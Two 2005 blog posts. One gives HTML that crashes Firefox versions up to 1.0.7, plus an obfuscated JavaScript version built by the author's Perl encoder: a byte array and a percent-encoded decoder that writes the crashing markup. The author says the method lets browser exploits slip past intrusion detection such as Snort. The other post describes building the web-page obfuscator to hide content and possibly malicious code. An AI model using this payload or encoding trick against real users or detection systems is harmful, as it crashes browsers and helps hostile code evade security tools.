Monday, October 17, 2005 

Obfuscating The Mozilla Recent Firefox DOS

The recent program I created for obfuscating webpages can be used for obfuscating the recent Mozilla Firefox Denial of Service Attack that affects all versions of Mozilla Firefox currently up to 1.0.7.

My script for obfuscating web pages is at:

Here is an example of HTML code that would cause the denial of service in Mozilla Firefox:

<html><body><italic>There is nothing to see here... move along...<sourcetext></body></html>

Note, that the original published advisory used "strong" in place of italic, but I was playing aroud with it, and I found that italic also worked. So, you could argue that this was a second undocumented exploit, or a variation of the first one or whatever... In any case, since it is slightly different from the first one, it is also slightly less likely to be detected in an of itself. But, that is not the point of this.

The point is, that you can take the above HTML, put in in a file and the run the above Perl script on it. The output is the following JavaScript:

<script language="JavaScript">
lzArray=[ 253,169,181,172,173,255,253,163,174,165,184,255,253,168,181,160,173,168,162,255,149,169,164,179,164,225,168,178,225,175,174,181,169,168,175,166,225,181,174,225,178,164,164,225,169,164,179,164,239,239,239,225,172,174,183,164,225,160,173,174,175,166,239,239,239,253,178,174,180,179,162,164,181,164,185,181,255,253,238,163,174,165,184,255,253,238,169,181,172,173,255];
tData= "%66%6F%72%20%28%69%3D%30%3B%20%69%3C%6C%7A%41%72%72%61%79%2E%6C%65%6E%67%74%68%3B%20%69%2B%2B%29%20%7B%63%3D%20%6C%7A%41%72%72%61%79%5B%69%5D%3B%20%63%3D%30%78%46%46%20%2D%20%63%20%5E%20%30%78%33%45%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%29%7D%20%3B";

This JavaScript is then automatically converted back to the appropriate HTML by Mozilla FireFox and then correctly performs the DOS. Likewise, the other recent exploits against web browsers could also be obfuscated this way and thus bypass instrusion detection systems like Snort. Notice how easily the encoding and decoding of the data is. Yeah the encryption is not really encryption at all. It is trivial to break. But, on the other hand, since I can write any kind of Turing compatible algorithm to encrypt and decrypt the data, you are going to have a hard time writing something to decrypt the data in advance to find whether or not it contains any mallicous code. Unless ofcourse you want to just run the Javascript. But then how do you know that it will ever halt? So, in conclusion, as long as there are buffer overflows that can be triggered with raw HTML, that is kind of a bad thing for web browsers. And I think that maybe antivirus and intrusion detection systems are not really going to save people.

Friday, October 07, 2005 

Obfuscating Web Pages

I was reading my spam on one of my many online accounts, hoping to find some new vunerability used for spyware installation or something when I stumbled across something interesting. It was a web page that had it's source code encrypted and used a VBScript to decrypt and display it dynamically. I thought is was a pretty ineresting idea. Their page is at: (not recomended for work)

Ofcourse, it didn't display properly in Mozilla Firefox, and this bothered me. So, I set out to create a program that would obfuscate web pages in a similar manner using JavaScript, rather than VBScript.

Here is what I came up with:

The idea behind the original program (I think) is that content filters looking for certain words would not find anything amiss on the page, and so they would let it pass. But, I think that the concept could also be used to disguise mallicous code as well.